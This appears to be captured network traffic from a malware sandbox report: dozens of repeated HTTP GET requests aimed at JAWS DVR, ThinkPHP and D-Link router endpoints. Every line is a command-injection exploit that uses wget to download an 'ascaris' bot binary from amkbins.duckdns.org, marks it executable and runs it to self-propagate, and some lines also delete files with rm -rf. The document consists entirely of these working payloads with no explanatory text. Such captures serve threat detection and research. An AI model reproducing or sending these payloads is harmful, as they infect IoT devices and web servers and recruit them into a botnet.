            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://amkbins.duckdns.org/bins/ascaris.mips%20-O%20->%20/tmp/ascaris;chmod%20777%20/tmp/ascaris;/tmp/ascaris%20dlink.selfrep%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: tbox/2.0
            Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://amkbins.duckdns.org/bins/ascaris.mips%20-O%20->%20/tmp/ascaris;chmod%20777%20/tmp/ascaris;/tmp/ascaris%20dlink.selfrep%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: tbox/2.0
            Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://amkbins.duckdns.org/bins/ascaris.mips%20-O%20->%20/tmp/ascaris;chmod%20777%20/tmp/ascaris;/tmp/ascaris%20dlink.selfrep%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: tbox/2.0
            Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://amkbins.duckdns.org/bins/ascaris.mips%20-O%20->%20/tmp/ascaris;chmod%20777%20/tmp/ascaris;/tmp/ascaris%20dlink.selfrep%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: tbox/2.0
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+rm+-rf+*;+wget+http://amkbins.duckdns.org/bins/ascaris.arm7;+chmod+777+ascaris.arm7;+./ascaris.arm7+jaws.selfrep HTTP/1.0Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: tbox/2.0
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+rm+-rf+*;+wget+http://amkbins.duckdns.org/bins/ascaris.arm7;+chmod+777+ascaris.arm7;+./ascaris.arm7+jaws.selfrep HTTP/1.0Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: tbox/2.0
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+rm+-rf+*;+wget+http://amkbins.duckdns.org/bins/ascaris.arm7;+chmod+777+ascaris.arm7;+./ascaris.arm7+jaws.selfrep HTTP/1.0Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: tbox/2.0
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+rm+-rf+*;+wget+http://amkbins.duckdns.org/bins/ascaris.arm7;+chmod+777+ascaris.arm7;+./ascaris.arm7+jaws.selfrep HTTP/1.0Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: tbox/2.0
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+rm+-rf+*;+wget+http://amkbins.duckdns.org/bins/ascaris.arm7;+chmod+777+ascaris.arm7;+./ascaris.arm7+jaws.selfrep HTTP/1.0Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: tbox/2.0
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+rm+-rf+*;+wget+http://amkbins.duckdns.org/bins/ascaris.arm7;+chmod+777+ascaris.arm7;+./ascaris.arm7+jaws.selfrep HTTP/1.0Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: tbox/2.0
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+rm+-rf+*;+wget+http://amkbins.duckdns.org/bins/ascaris.arm7;+chmod+777+ascaris.arm7;+./ascaris.arm7+jaws.selfrep HTTP/1.0Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: tbox/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://amkbins.duckdns.org/bins/ascaris.mips%20-O%20->%20/tmp/ascaris;chmod%20777%20/tmp/ascaris;/tmp/ascaris%20dlink.selfrep%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: tbox/2.0
            Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://amkbins.duckdns.org/bins/ascaris.mips%20-O%20->%20/tmp/ascaris;chmod%20777%20/tmp/ascaris;/tmp/ascaris%20dlink.selfrep%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: tbox/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://amkbins.duckdns.org/bins/ascaris.mips%20-O%20->%20/tmp/ascaris;chmod%20777%20/tmp/ascaris;/tmp/ascaris%20dlink.selfrep%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: tbox/2.0
            Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://amkbins.duckdns.org/bins/ascaris.mips%20-O%20->%20/tmp/ascaris;chmod%20777%20/tmp/ascaris;/tmp/ascaris%20dlink.selfrep%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: tbox/2.0
